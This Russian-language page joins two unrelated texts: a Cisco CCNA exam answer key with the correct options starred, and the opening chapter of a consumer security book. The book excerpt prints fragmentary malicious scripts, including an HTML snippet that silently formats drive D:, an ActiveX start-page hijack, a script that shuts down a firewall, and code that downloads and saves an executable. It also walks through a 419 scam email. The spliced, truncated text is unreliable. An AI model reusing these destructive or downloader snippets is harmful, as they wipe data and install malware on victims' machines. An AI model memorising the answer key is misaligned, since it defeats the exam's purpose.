Cisco ответы на главы и экзамены.
Экзамен по главе . курса CCNA Introduction to Networks
1 Какое утверждение о MAC-адресах является верным?
MAC-адреса реализуются программным обеспечением.
Сетевому адаптеру требуется MAC-адрес только при подключении к глобальной сети (WAN).
**Первые три байта используются OUI, назначенным поставщиком.
ISO отвечает за правила использования MAC-адресов.
2 В чем заключается одна из особенностей конкурентного способа доступа к среде передачи данных?
Он обрабатывает больше нагрузки, чем при использовании способов контролируемого доступа.
Он использует механизмы для отслеживания очереди доступа к среде.
Это недетерминированный способ.
Он очень хорошо масштабируется при высокой загруженности среды.
3 Какие два утверждения описывают свойства или функции подуровня управления логическим каналом в стандартах Ethernet? (Выберите два варианта ответа.)
**LLC (управление логическим каналом) реализуется в ПО.
LLC регламентируется стандартом IEEE 802.3.
Подуровень LLC непосредственно взаимодействует с программным обеспечением драйвера сетевой платы.
**Канальный уровень использует LLC для связи с верхними уровнями набора протоколов.
Подуровень LLC отвечает за размещение и извлечение кадров в среде передачи данных.
4 Каково назначение преамбулы в кадре Ethernet?
используется в качестве заполнителя для данных
**используется для синхронизации
используется для определения адреса источника
используется для определения адреса назначения
5 Какой MAC-адрес мультиадресной рассылки уровня 2 соответствует адресу многоадресной передачи IPv4 224.139.34.56 уровня 3?
00-00-00-0B-22-38
**01-00-5E-0B-22-38
01-5E-00-0B-22-38
FE-80-00-0B-22-38
FF-FF-FF-0B-22-38
6 Какие два утверждения о MAC- и IP-адресах во время передачи данных без преобразования сетевых адресов (NAT) являются верными? (Выберите два варианта ответа.)
Пакет, который прошел четыре маршрутизатора, изменял IP-адрес назначения четыре раза.
MAC-адреса получателей никогда не изменятся в кадре, который проходит через семь маршрутизаторов.
**MAC-адреса назначения и источника имеют локальное значение и меняются при каждом переходе кадра из одной локальной сети в другую.
**IP-адреса назначения в заголовке пакета не меняются по всему пути к узлу назначения.
После каждой инкапсуляции кадра с новым MAC-адресом назначения необходим новый IP-адрес назначения.
7 Укажите две характеристики протокола ARP. (Выберите два варианта ответа.)
**Если узел готов отправить пакет локальному устройству назначения и у него есть IP, но не MAC-адрес назначения, он создаёт широковещательную рассылку ARP.
Запрос ARP отправляется всем устройствам в сети Ethernet для локальных сетей, а также содержит IP-адрес узла назначения и его MAC-адрес мультиадресной рассылки.
Когда узел инкапсулирует пакет в кадр, он обращается к таблице MAC-адресов для определения маршрута от IP-адресов к MAC-адресам.
Если ни одно устройство не отвечает на запрос ARP, узел-отправитель передаёт пакеты данных всем устройствам, находящимся в сегменте сети.
**Если устройство, которое получает запрос ARP, имеет адрес назначения IPv4, то отвечает ответом ARP.
8 Посмотрите на рисунок. ПК1 отправляет запрос ARP, поскольку ему нужно отправить пакет на ПК2. Что происходит дальше?
**ПК2 отправит ответ ARP со своим MAC-адресом.
Маршрутизатор RT1 отправит ответ ARP со своим MAC-адресом Fa0/0.
Маршрутизатор RT1 отправит ответ ARP со своим MAC-адресом PK2.
Коммутатор SW1 отправит ответ ARP со своим MAC-адресом PK2.
Коммутатор SW1 отправит ответ ARP со своим MAC-адресом Fa0/1.
9 Узел пытается отправить пакет устройству в удалённом сегменте локальной сети, но в настоящее время в его кэш-памяти ARP нет сопоставлений. Как устройство получит MAC-адрес назначения?
Оно отправит запрос ARP для получения MAC-адреса устройства назначения.
**Оно отправит запрос ARP для получения MAC-адреса шлюза по умолчанию.
Оно отправит кадр и будет использовать свой собственный MAC-адрес в качестве адреса назначения.
Оно отправит кадр с MAC-адресом широковещательной рассылки.
Оно отправит запрос на DNS-сервер для получения MAC-адреса назначения.
10 Какие две потенциальные проблемы сети могут возникнуть в результате работы протоколов ARP? (Выберите два варианта ответа.)
Ручная настройка статических связей ARP может привести к «отравлению» кэша ARP или спуфингу MAC-адресов.
**В крупных сетях с низкой пропускной способностью широковещательная рассылка ARP может стать причиной задержки передачи данных.
**Хакеры могут использовать схемы MAC- и IP-адресов в сообщениях ARP с целью перехвата сетевого трафика.
Большое количество широковещательных запросов ARP может привести к переполнению таблицы MAC-адресов узла и нарушению коммуникации по сети.
Множественные ответы ARP формируют таблицу MAC-адресов коммутатора, в которой содержатся записи, соответствующие MAC-адресам узлов, подключённых к порту коммутатора.
11 Сетевой администратор подключает два современных коммутатора с помощью прямого кабеля. Коммутаторы новые и никогда не настраивались. Какие три утверждения о конечном результате подключения являются верными? (Выберите три варианта ответа.)
**Канал между коммутаторами будет работать на самой высокой скорости, поддерживаемой этими коммутаторами.
**Канал между коммутаторами будет работать в полнодуплексном режиме.
Если оба коммутатора поддерживают различные скорости, они будут работать на самой быстрой для себя скорости.
**Автоматическая MDIX-функция настроит интерфейсы без необходимости кроссового кабеля.
Связь невозможна, если администратор заменит кабель на кроссовый кабель.
Дуплексный канал необходимо настраивать автоматически.
12 Коммутатор уровня 2 используется для коммутации входящих кадров от порта 1000BASE-T к порту, подключённого к сети 100Base-T. Какой метод буферизации памяти наилучшим образом подходит для этой задачи?
буферизация на основе портов
буферизация кэша уровня 1
**буферизация совместного доступа к памяти
буферизация фиксированной конфигурации
13 Когда коммутатор вносит много записей для одного порта коммутатора в таблице MAC-адресов?
когда маршрутизатор подключён к порту коммутатора
когда пересылается несколько широковещательных рассылок ARP
**когда другой коммутатор подключён к порту коммутатора
когда коммутатор настроен для коммутации на уровне 3
14 Посмотрите на рисунок. На изображении показаны небольшая сеть с коммутатором и содержимое таблицы MAC-адресов коммутатора. ПК1 отправил кадр, адресованный ПК3. Что коммутатор сделает с кадром?
Коммутатор отбросит кадр.
Коммутатор перешлёт кадр только на порт 2.
**Коммутатор перешлёт полученный кадр на все порты, за исключением порта 4.
Коммутатор перешлёт кадр на все порты.
Коммутатор перешлёт кадр только на порты 1 и 3.
15 Какие два утверждения характеризуют фиксированную конфигурацию коммутатора Ethernet? (Выберите два варианта ответа.)
Коммутатор нельзя настроить для работы в нескольких VLAN (виртуальная локальная сеть).
SVI нельзя настроить на коммутаторе.
**Коммутатор с фиксированной конфигурацией может быть стекируемым.
**Число портов на коммутаторе нельзя увеличить.
Плотность портов коммутатора определяется компанией CISCO IOS.
16 Как добавление линейной платы Ethernet влияет на форм-фактор коммутатора?
увеличивает скорость коммутации соединительной панели
**увеличивает плотность портов
делает коммутатор стекируемым
расширяет ёмкость NVRAM
17 Администратор сети выполняет следующие команды на коммутаторе уровня 3:
DLS1 (config)# interface f0/3
DLS1(config-if)# no switchport
DLS1(config-if)# ip-address 172.16.0.1 255.255.255.0
DLS1(config-if)# no shutdown
DLS1(config-if)# end
.Что настраивает администратор?
**порт с маршрутизацией
коммутируемый виртуальный интерфейс
экземпляр Cisco Express Forwarding
магистральный интерфейс
18 Какой адрес или комбинация адресов используется коммутатором уровня 3 для принятия решений о пересылке?
только IP-адрес
только адрес порта
только MAC-адрес
MAC- и адреса порта
**MAC- и IP-адреса
19 Какое утверждение характеризует недостаток множественного доступа с контролем несущей (CSMA/CD)?
Обусловленные протоколы доступа к среде передачи данных ухудшают производительность сети.
Он сложнее, чем необусловленные протоколы.
**Коллизии могут снизить производительность сети.
Технологии локальной сети CSMA/CD доступны только при более низкой скорости по сравнению с другими технологиями локальной сети.
20 Заполните пустое поле.
Двоичное число 0000 1010 можно выразить в
шестнадцатеричной системе.
Правильный ответ: 0A
23 Откройте интерактивное задание PT. Выполните задания, указанные в описании упражнения, а затем ответьте на вопрос.
Какой адрес назначения ПК1 добавит в поле адреса назначения кадра Ethernet, который отправляется на ПК2?
192.168.0.17
192.168.0.34
**0030.a3e5.0401
00e0.b0be.8014
0007.ec35.a5c6
Олег михайлович бойцев защити свой компьютер на 100% от вирусов и хакеров олег михайлович бойцев защити свой компьютер на 100 % от вирусов и хакеров
Написание книги – нелегкий труд, успех которого невозможен без посторонней помощи.
Выражаю благодарность своим друзьям и близким, издательству «Питер», в особенности Дмитрию Гурскому и Юлии Чернушевич, и всем, кто потратил на данную работу свои силы и время.
Добро пожаловать! Наверняка читатель, который держит в руках эту книгу, уже не понаслышке знаком с вопросами информационной безопасности вообще и компьютерной в частности. Даже если это не так и вы начинающий пользователь, то материал, приведенный в книге, должен помочь продвинуться вглубь. «Выше, быстрее, сильнее!» – именно этот девиз должен сейчас стать главным для читателя, рискнувшего укротить «стихию» мира компьютерной безопасности.
В современном мире информационных технологий работают те же звериные законы выживания, что и в живой природе. Что может почувствовать человек, увидевший на экране банкомата не привычное Выберите сумму, а голубой экран с кнопкой Пуск в левом нижнем углу и бесстыжее окошко с сообщением об ошибке вместо долгожданной зарплаты?
Взлом сайтов, кража паролей и конфиденциальной информации, удаленные проникновения и вторжения – это та реальность, в которой мы живем. «Не так уж все и облачно», – скажут некоторые из читателей и будут правы лишь в том, что в действительности информация о взломах, которую обнародуют, – лишь небольшой процент от реальных инцидентов взлома.
Против чего надо защищаться в первую очередь и какими средствами это можно сделать эффективнее всего – ответы на эти вопросы читатель найдет на страницах данной книги.
Так уж повелось, что издания, посвященные компьютерной безопасности, чаще всего можно грубо разделить на те, которые рассчитаны на профессионалов, и те, что предназначены для новичков. Ко всему прочему издания подобного рода обычно рассматривают вопросы безопасности исключительно с точки зрения защиты.
Эта книга коренным образом разрушает такой стереотипный подход. Она будет одинаково полезной и интересной как для новичков, так и для продвинутых пользователей. Вопросы безопасности здесь рассмотрены как с точки зрения защиты, так и с точки зрения взлома.
Издание удачно сочетает в себе теорию и практику. Многочисленные примеры из реальной жизни и иллюстрации позволяют за считанное время овладеть навыками организации многоуровневой системы защиты от хакерских вторжений и вредоносного кода.
Усвоив материал издания, вы с легкостью сможете ответить на множество вопросов, касающихся компьютерной безопасности.
Все материалы, приведенные в книге, носят исключительно ознакомительный характер. Автор не несет никакой ответственности за использование их в злонамеренных целях.
Ваши замечания, предложения и вопросы отправляйте по адресу электронной почты dgurski@ (издательство «Питер», компьютерная редакция).
Мы будем рады узнать ваше мнение!
На сайте издательства вы найдете подробную информацию о наших книгах.
Введение в безопасность
♦ Классическая модель безопасности – это мыльный пузырь?
♦ Основы информационной безопасности
♦ Некоторые разновидности сетевых атак
♦ Классификация угроз безопасности веб серверов
Цель данной главы – сформировать у читателя базовое представление о том, что же такое компьютерная безопасность. Здесь же в деталях приводится авторитетная классификация угроз безопасности веб серверов, призванная упорядочить знания и помочь разобраться в многообразии возможных атак и их реализации. Начнем первую главу с рассмотрения классической модели безопасности.
1.1. Классическая модель безопасности – это мыльный пузырь?
Предположим, что рассматриваемая нами система (в данном контексте будем говорить об операционных системах линейки Windows) защищена межсетевым экраном и антивирусом; ко всему прочему (а это, с точки зрения взлома, можно считать одним из ключевых моментов), пользователь работает не от прав администратора!
Насколько безопасна такая система? Попробуем выяснить это вместе.
Нужен ли нам антивирус? «Конечно же, нужен, – скажет абсолютное большинство. – Как без антивируса то? Чем же мы будем защищаться?».
Диски надо регулярно проверять? Вдруг «киберзараза» тихо сидит и ждет, а потом в определенный день и час отформатирует жесткий диск.
Проверять, разумеется, лучше всего регулярно – как минимум раз в неделю, как это советуют специалисты по компьютерной безопасности. Надо проверять все носители информации: само собой разумеется, жесткий диск, конечно же, дискеты, флэш карты и обязательно компакт диски – совсем не важно, что это займет у вас некоторое время, ведь безопасность превыше всего.
Обновление антивирусных баз – это вообще святое. Базы недельной давности – уже древние. Поэтому риск «подцепить заразу» со старыми базами очень велик, и это прописная истина. Выход – базы надо обновлять регулярно.
Время идет, и в один прекрасный момент у вашего антивируса заканчивается срок лицензии (если он не бесплатный, конечно), и «страж» выдает сообщение, что надо бы купить ключик, а то программа не будет полноценно работать. Ну что ж, выход есть – надо найти ключ.
Одного антивируса явно недостаточно! Все мы знаем, что для обеспечения мало мальски приличного уровня безопасности надо установить два антивирусных продукта, а чтобы они не конфликтовали – на разные системы. Все верно.
Все было сделано правильно и работало на ура… Ничего не предвещало беды… пока в один прекрасный день система не легла таки под новым вирусом неизвестного происхождения. Файлы были хитро переписаны вирусным кодом и/или жесткий диск зверски отформатирован. Но ведь все было сделано правильно!
Вариант 1. Вы «подцепили заразу» раньше, чем ее сигнатуры успели попасть в базы вашего антивируса, к тому же вирусом оказался не классический EXE файл, а HTML страница. Почему бы и нет?
Механизм работы такого вируса реализуется через уязвимости браузера при обработке ActiveX объектов. Итак, начнем веселый некролог системе следующим образом (листинг 1.1).
Листинг 1.1. Устанавливаем стартовую страницу браузера
CLASSID=»CLSID:F935DC26 1CF0 11D0 ADB9 00C04FD58A0B»>
Shl.RegWrite («HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page», «»);
Вариант 2. Звучит кощунственно: содержимое HTML файла, подобно патологоанатому, методично «потрошит» винчестер. Невозможно? Еще как возможно! А вот и сценарий стартовой страницы (листинг 1.2).
Листинг 1.2. HTML код, форматирующий диск D:
n(«cmd /c format d:/y»,0);
Вышеописанный сценарий, внедренный злоумышленником в HTML страницу, ни много ни мало незаметно форматирует диск, указанный в коде.
Продолжим веселый некролог.
Вариант 3. Система притормаживала, и на время игры в Counter Strike пользователь отключил антивирус. «Зараза» чувствует это и выполняет свою «культурную программу».
Вариант 4. Антивирус оказался беспомощным против нового упаковщика (упаковщик EXE файлов, позволяющий скрыть исходный код вируса от антивирусной программы), к тому же PE заголовок (часть EXE файла, отвечающая за исполнение; в данном случае редактирование PE заголовка выполнено с целью усложнения обнаружения антивирусом) вируса был мастерски отредактирован (листинг 1.3).
Листинг 1.3. Некоторый учебный пример модификации PE заголовка
mov eax, [esi + 0Ch] ; VirtualRVA(Last section)
add eax, [esi + 08h] ; VirtualSize(Last section)
mov [edi + 50h], eax
Вариант 5. «Зараза» успела отключить антивирус раньше, чем он ее обнаружил.
Эпикриз. Абсолютной защиты нет. Существующие варианты малоэффективны, занимают много времени и не способны обеспечить качественный уровень защиты.
Нужен ли нам брандмауэр?
Вопрос, что ли, ну совсем смешной. Конечно же нужен! А как без него то вообще? Брандмауэр – это первый рубеж, стоящий на страже нашей безопасности, и это уже знают даже школьники! Брандмауэр – это святое. Agnitum, Zone Alarm – кому что нравится.
Итак, брандмауэр установлен и настроен. Можно ли сказать, что компьютер защищен?
Вариант 1. На межсетевой экран был натравлен новый эксплоит (программа, эксплуатирующая уязвимость), после чего «огненная стена» превратилась в дымящуюся дыру, а пароли выхода в Интернет стали достоянием «благочестивой общественности». В данном случае не важен механизм проникновения– идея в том, что практически ни один программный продукт не застрахован от уязвимостей. Следующий код на JavaScript (листинг 1.4) – лишь пример, но…
Листинг 1.4. Просто выгружаем наш межсетевой экран (на примере Agnitum)
set WShell = CreateObject(«WScript.Shell»)
WShell.Exec » Files\Agnitum\Outpost Firewall\outpost.exe»
WShell.AppActivate «Agnitum», TRUE
Большинство из приведенных примеров подобного рода распознаются антивирусами как самый настоящий «зло код» (рис. 1.1)!
Рис. 1.1. «Антивирус Касперского 7.0» распознал наш код как самого настоящего троянского коня
Вариант 2. Пароли «спионерили», используя уязвимости браузера: брандмауэр молчал как партизан, ведь в его правилах 80 й порт должен быть открыт! Пример (листинг 1.5) – реализация все того же ActiveXObject. Реакцию «Антивируса Касперского 7.0» смотрите на рис. 1.2.
Рис. 1.2. И опять наш «Касперский» оказался на высоте
Листинг 1.5. Реализация уязвимости IE посредством ActiveXObject!
var x = new ActiveXObject(«Microsoft.XMLHTTP»);
x.OpenC’GET’, «/1.exe», 0);
var s = new ActiveXObject(«ADODB.Stream»);
result += line +’\\r\\n’;
myURL = «file:javascript:eval(» + mycode + «‘)»;
Вариант 3. Ни брандмауэр, ни антивирус тут вообще ни при чем. Пароли «утекли» через очередную успешно реализованную уязвимость, например, в службе LSASS (Local Security Authority Sub System). Благо же служб и сервисов у Windows предостаточно, а переполнение буфера никто не отменял. Приводить исходный код подобного вируса, пожалуй, вообще нет смысла.
Теперь попробуем разобраться, от чьих прав безопаснее осуществлять работу: администратора или пользователя.
Разумеется, пользователя! Все знают, что любой код, запущенный с правами администратора (к вирусам это тоже, конечно, относится), может куда больше, чем с правами «смертного» пользователя.
В качестве яркого примера, иллюстрирующего «всемогущие» возможности имени администратора, можно привести следующий код (листинг 1.6). Данный HTML код, запущенный от имени пользователя, можно считать довольно безобидным, но только до тех пор, пока он не будет запущен от имени администратора.
Листинг 1.6. Наш учебный код
Приведенный сценарий, как и другие, использованные в тексте, не претендует на оригинальность (хотя бы потому, что определяется антивирусом) и является всего лишь примером.
А если человек постоянно работает от прав пользователя? Может ли это означать, что система защищена от выполнения кода, требующего административных привилегий? Да, действительно, работа с низкими привилегиями значительно повышает общий уровень безопасности системы (вспомнить хотя бы UNIX системы, в которых работа без прав суперпользователя считается правилом хорошего тона), но не будем забывать про вредоносные программы, повышающие привилегии! Фантастика? Да никакая не фантастика.
Читателям, которые усомнятся, аргументируя свою уверенность тем, что сервисы вроде DepLoit или GetAdmin уже древность, а альтернативы им нет, достаточно лишь заглянуть на .
Даже при условии, что пользователь постоянно использует run as (утилита, вызываемая из контекстного меню для вторичного входа в систему), войти в систему от «настоящего» администратора рано или поздно ему придется. «Зараза» почувствует это и выполнит свою программу.
Таким образом, наличие в системе антивирусной программы и межсетевого экрана, даже если учесть работу пользователя не от прав администратора, не может стать гарантией того, что система не будет взломана. Взлом системы с конфигурацией, описанной выше, может быть осуществлен даже непрофессионалом!
1.2. Основы информационной безопасности
Прежде чем перейти к знакомству с основами информационной безопасности, резонно заметить, что объем приведенных материалов можно считать лишь ознакомительным, но никак не исчерпывающим руководством, в силу того что полное изложение данной темы выходит за рамки книги.
Итак, информационная безопасность (ИБ) – это процесс и состояние, при котором достигается приемлемый уровень защищенности информации в процессе ее использования.
Чтобы лучше понять, что же такое ИБ, зачем она нужна и какое состояние системы можно считать небезопасным, прежде всего необходимо уяснить себе, какие цели преследует эта самая ИБ.
Выделяют пять основных целей ИБ, среди которых самыми главными можно считать следующие:
Под конфиденциальностью понимается доступность информации только определенному кругу лиц (например, информация под грифом «секретно» предназначена исключительно для авторизованного персонала).
Под доступностью понимается возможность получения информации авторизованными пользователями в нужное для них время (например, банк предоставляет возможность осуществления транзакций посредством обращения пользователя к корпоративному сайту, при этом сайт должен быть доступен любому пользователю, подключившемуся к Интернету).
Под целостностью понимается гарантия существования информации в неискаженном, истинном виде (например, тот же банк должен быть уверен, что персональные данные, переданные в сеть пользователем, не искажены и верны).
Чтобы не возникло путаницы в определениях, терминах и понятиях, а также в вопросах, касающихся практического применения инструментов ИБ, уже достаточно давно были созданы стандарты информационной безопасности.
Наиболее известна оранжевая (по цвету обложки) книга Министерства обороны США. В этом документе определяется четыре уровня безопасности: D, С, В и А. По мере перехода от уровня D к А к надежности систем предъявляются все более жесткие требования. Уровни С и В подразделяются на классы C1, C2, В1, В2 и ВЗ. Чтобы система в результате процедуры сертификации могла быть отнесена к некоторому классу, ее защита должна удовлетворять оговоренным требованиям.
Вместе с тем следует упомянуть и британский стандарт BS 7799 «Управление информационной безопасностью. Практические правила», который лег в основу международного стандарта ISO/IEC 17799:2005, который, в свою очередь, стал базой для стандарта ISO/IEC 27001.
Следующим понятием ИБ, которое логически вытекает из представлений о стандартах информационной безопасности, является политика ИБ.
Итак, политика безопасности (от англ. security policy) представляет собой совокупность правил, установок и принципов, соблюдение которых обеспечивает приемлемый уровень безопасности/защищенности информационного пространства и инфраструктуры, непосредственно связанной с деятельностью рассматриваемой организации.
Результатом работы администратора безопасности должно стать создание документа политики ИБ.
При создании документа политики ИБ особое внимание необходимо обратить на следующие вопросы:
♦ что можно отнести к активам организации (данные, персонал, обслуживающая инфраструктура, материальные ценности);
♦ насколько чувствительна и секретна рассматриваемая информация;
♦ какие факторы и в каком объеме могут нанести фирме ущерб в информационном аспекте (идентификация угроз);
♦ насколько уязвима система для вторжения изнутри и снаружи (идентификация уязвимостей);
♦ каковы риски организации с учетом входных данных (угрозы, уязвимости, ущерб, активы) и что можно предпринять для минимизации этих рисков.
Определение рисков ИБ и их минимизация являются, пожалуй, ключевым моментом, определяющим актуальность и эффективность политики ИБ.
Как определить, является риск для организации большим или маленьким, приемлемым или недопустимым? В простейшем случае для выяснения степени риска можно воспользоваться матрицей рисков (табл. 1.1).
Из табл. 1.1 вовсе нетрудно догадаться, что величина риска является результатом произведения входных значений (угрозы и ущерба).
Как видно из таблицы, риск можно классифицировать по уровню:
Таблица 1.1. Матрица рисков (согласно рекомендациям NIST «Risk Management Guide for Information Technology Systems»)
Понятное дело, что если организация имеет дело с высоким риском, то его необходимо нейтрализовать или в крайнем случае минимизировать.
Если анализ системы показывает, что для минимизации и/или нейтрализации риска могут потребоваться слишком большие неоправданные затраты, то целесообразно отнести такой риск к категории приемлемых. Ущерб от атаки и затраты на ее предотвращение должны быть сбалансированы!
Как правило, система с высоким уровнем риска наиболее подвержена атакам. В зависимости от источника можно выделить по крайней мере два типа атак:
♦ атаки, исходящие изнутри (чаще всего ассоциированы с действием инсайдеров).
В рамках следующего раздела мы поговорим с вами о некоторых разновидностях сетевых атак, которые, как вы уже догадались, в большей своей части относятся к внешним атакам.
1.3. Некоторые разновидности сетевых атак
Сетевые атаки уже достаточно давно стали фоном современного киберпространства. Похищение конфиденциальных данных, кража паролей доступа, дефейс (взлом, результатом которого становится подмена заглавной страницы сайта) сайтов и DDoS атаки (Distributed Denial of Service – атака с использованием множества узлов для осуществления атаки на сервер жертву) сегодня можно считать чем то вроде привычной обстановки того, что мы называем компьютерной сетью. Интернет это или просто локальная сеть – особой разницы нет, так как любая сеть изначально предполагает обмен данными, взаимодействие между чем то, посредством чего то, а это, в свою очередь, как ни крути, создает все условия для перехвата, нарушения конфиденциальности и целостности информации.
Атаки, основанные на дырах операционной системы и программного обеспечения
Данный тип можно считать наиболее распространенным видом сетевых атак: уязвимости в операционных системах и программном обеспечении как находили, так и будут находить, ведь языки программирования невсесильны. Известный факт: чем больше размер кода, тем больше вероятность, что в нем существуют ошибки. Вот и получается: чем сложнее система, тем вероятнее, что она даст сбой. Парадоксально и закономерно одновременно.
Считается, что приложения на основе открытого кода, будучи более пластичными с точки зрения устранения программных ошибок, являются неким эталоном надежного программного кода. Для исправления вновь появившихся ошибок постоянно выпускают обновления, и, казалось бы, все не так уж и облачно. Но не тут то было.
Недавно проведенные группой IT специалистов при участии Министерства Национальной Безопасности США и Стэндфордского университета специальные исследования показали, что не существует Open Source проектов с меньшим количеством ошибок, чем в программах с закрытыми исходными кодами. В последнее время сторонниками открытых проектов утверждается, что одним из главных преимуществ открытого кода является низкое количество ошибок по сравнению с закрытыми программами. Был проведен сравнительный анализ ста пятидесяти самых популярных Open Source проектов и проприетарного кода более чем сотни компаний – более 60 млн строк на всех. Исследование показало, что Open Source про екты содержат ничуть не меньше ошибок, чем программы с закрытыми исходными кодами.
Какие именно ошибки программного кода компрометируют систему на атаку извне? Самые разнообразные. В качестве самого, пожалуй, яркого примера можно привести ошибку программного кода, посредством которого возможно переполнение буфера. Именно данная проблема (переполнение буфера) лежит в основе большинства уязвимостей и на сегодняшний день является самой распространенной в области безопасности сетевого ПО. Эта уязвимость активно используется вредоносным ПО, таким как компьютерные черви (например, CodeRed, Slammer, Lovesan) и вирусы. Указанная уязвимость с успехом применяется и для организации массированных DDoS атак, что говорит само за себя.
Вновь обнаруженные уязвимости ПО регулярно публикуются на сайтах типа . Обычно описание такой уязвимости включает в себя уровень ее опасности (например, критический) и содержит соответствующие программы для реализации данной уязвимости. При наличии подобной программы у атакующего осуществление атаки – дело самого ближайшего времени. В качестве горячего примера можно привести программу KaHt, эксплуатирующую уязвимость в службе DCOM RPC (уязвимы системы с первым сервис паком). Не менее интересный пример SMBdie – программное средство, посредством которого возможно вызвать удаленный отказ в обслуживании (рис. 1.3).
Данный вид сетевых атак можно считать самым настоящим киберкощунством. Посудите сами: на мирный электронный ящик ничего не подозревающего хозяина лавинообразно посылается куча писем, содержание которых иногда может быть просто неприличным. Предложение о сотрудничестве, о выезде за границу, нигерийские письма, в которых ваш дядя из Гваделупы предлагает несметные сокровища.
Для организации атак подобного рода применяют специальные программы – мейл бомберы. Такие приложения затопляют электронный почтовый ящик огромным количеством писем, обратный адрес которых фальшивый. Установить обратный адрес достаточно трудно даже по заголовку письма (HEAD), так как IP отправителя не имеет ничего общего с тем, что указан в заголовке. Для осуществления коварного плана злонамеренному пользователю достаточно знать адрес электронной почты жертвы.
Рис. 1.3. Программа SMBdie в действии
Большинство почтовых систем имеют антиспам фильтры, защищающие клиентов от подобных сетевых вакханалий. Все, казалось бы, в розовом свете, но почему то, несмотря на усиливающиеся беспрецедентные меры защиты от подобного рода атак, спам приходит и приходит. Все дело, наверное, в том, что алгоритмы распространения такого мусора умнеют параллельно с интеллектуализацией систем защиты.
Основным способом рассылки спамерских сообщений было и по прежнему остается использование сетей, созданных на основе зомбированных систем ничего не подозревающих пользователей. Можно констатировать, что спамеры активно идут по пути наращивания мощностей и развития зомби сетей.
В качестве горячего примера мейл бомбинга будет более чем уместно привести следующее. Итак, привожу текст письма, отправителем которого является щедрый дядька из банановой республики, готовый поделиться миллионами, ради того чтобы вы согласились на маленькую услугу.
«FROM MR USMAN KAMAL
BILL AND EXCHANGE MANAGER
BANKOF AFRICA (BOA) OUAGADOUGOU BURKINA FASO».
Письмо отправлено мистером Усманом Камалом, финансовым менеджером Банка Африки.
Ну что ж, для начала неплохо. Управляющий банка и все такое. Читаем дальше.
Стоп! Далее идет нечто весьма и весьма странное, можно даже сказать, ужасное – «OUAGADOUGOU»! Ну что, может, все таки, появилась тень сомнения?
Появилась и исчезла. Пройдя через Lingvo, «OUAGADOUGOU» оказалось замечательным городом Уагадугу, а вовсе не тайным заклинанием колдунов культа Вуду. «А «BURKINA FASO»? Это что?» – спросят многие. Буркина Фасо – это государство в Западной Африке!
Ну, это понятно: значит, конфиденциально, секретно.
«DEAR FRIEND, I AM THE MANAGER OF BILL AND EXCHANGE AT THE FOREIGN REMITTANCE DEPARTMENT OF BANK OF AFRICA (B.O.A) HERE IN OUAGADOUGOU, BURKINA FASO».
Дорогой друг (они уже успели с вами подружиться), я менеджер по всем самым важным финансовым вопросам вышеназванного банка африканского гогода Уагадугу.
«IN MY DEPARTMENT WE DISCOVERED AN ABANDONED SUM OF $25 000 000 (TWENTY FIVE MILLION UNITED STATE DOLLARS) IN AN ACCOUNT THAT BELONGS TO ONE OF OUR FORIEGN CUSTOMER (MR. ANDREAS SCHRANNER FROM MUNICH, GERMANY) WHO DIED ALONG WITH HIS ENTIRE FAMILY IN JULY2006 IN A PLANE CRASH».
Читаем далее: в нашем подразделении, или отделе (что, впрочем, не так важно), мы обнаружили заброшенный, покинутый, ничей (вот так незадача) счет на $25 млн. Счет принадлежал иностранному клиенту – мистеру ANDREAS SCHRANNER из Германии, который трагически погиб в июле 2006 года вместе со всей своей семьей в авиакатастрофе.
(ссылка на некий ресурс, доказывающий, что авария с указанным лицом действительно произошла)
Хм, ну что ж. По логике вещей, конечно, жалко погибшего, а как же быть с 25 млн американских долларов? Написавший это письмо утверждает, что счет никому не принадлежит. Намек что ли? Но пока это только не более чем намеки. Посмотрим, что нам пишут дальше.
«SINCE WE GOT THE INFORMATION ABOUT HIS DEATH, WE HAVE BEEN EXPECTING HIS NEXT OF KIN TO COME OVER AND CLAIM HIS MONEY BECAUSE WE CANNOT RELEASE IT, UNLESS SOMEBODY APPLIES FOR THE NEXT OF KIN OR RELATION TO THE DECEASED AS INDICATED IN OUR BANKING GUIDING AND LAW BUT UNFORTUNATELY WE LEARNT THAT HIS NEXT OF KIN DIED ALONG
WITH HIM IN THE PLANE CRASH.
THE BANKER GUIDELINE HERE A RESPONSABLE PERSON, AND WHO THE BANK CAN INTROSSTED THIS TREASURY AS UNCLAIMED FUND.
THE RESQUEST OF FORIEGNER AS NEXT OFKININHIS BUSINESS IS OCCASSIONED
BY THE FACT THAT THE CUSTOMER WAS A FOREIGNER AND A BURKINABE
CANNOT STAND AS NEXT OF KIN TO A FOREIGNER».
С момента получения нами информации о смерти клиента мы приложили все усилия, чтобы найти кого нибудь из ближайших его родственников, но вынуждены признать, что все его родственники погибли в авиакатастрофе. Мы ищем подходящего человека (а такой подходящий именно вы и никто другой, будьте в этом уверены!) для обналичивания счета.
По логике вещей должен возникнуть вопрос: почему этот менеджер не может найти этого «нужного» человека там, в Африке? Ответ прост: этот человек должен быть иностранцем, то есть вы именно тот, кто идеально подходит для этой цели.
«I AGREE THAT 30% OFTHIS MONEYWILL BE FOR YOU AS A RESPECT TO THE PROVISION OF A FOREIGN ACCOUNT».
И вот здесь начинается самое интересное. Господин USMAN KAMAL предлагает нам 30 % от суммы, лежащей на счете, а это ни много ни мало 7 млн 500 тыс. американских долларов (!).
«10 % WILL BE SET ASIDE FOR ANY EXPENSES INCURRED DURING THE BUSINESS AND 60 % WOULD BE FOR ME.
HEREAFTER, I WILL VISIT YOUR COUNTRY FOR DISBURSEMENT ACCORDING TO THE PERCENTAGE INDICATED THEREFORE, TO ENABLE THE IMMEDIATE TRANSFER OF THIS FUND TO YOU AS ARRANGED».
10 % от этой суммы пойдут на «производственные» расходы, а 60 % он заберет себе. После чего Усман обещает приехать в нашу страну и уладить все вопросы, касающиеся срочного перевода денег.
«YOU MUST APPLY FIRST TO THE BANK AS RELATION OR NEXT OF KIN OF THE DECEASED INDICATING YOUR BANK NAME, YOUR BANK ACCOUNT NUMBER, YOUR PRIVATE TELEPHONE NUMBER AND YOUR FAX NUMBER FOR EASY AND EFFECTIVE COMMUNICATION AND LOCATION WHERE IN THE MONEY WILL BE
Чтобы стать счастливым обладателем 30 % от указанной выше суммы, необходимо сделать совсем ничего, а именно: обратиться в соответствующий банк в качестве родственника погибшего, указав реквизиты своего банковского счета, включая свой личный номер телефона и факса.
«UPON RECEPIT OF YOUR REPLY, I WILL SEND TO YOU BY FAX OR EMAIL THE TEXT OF APPLICATION^
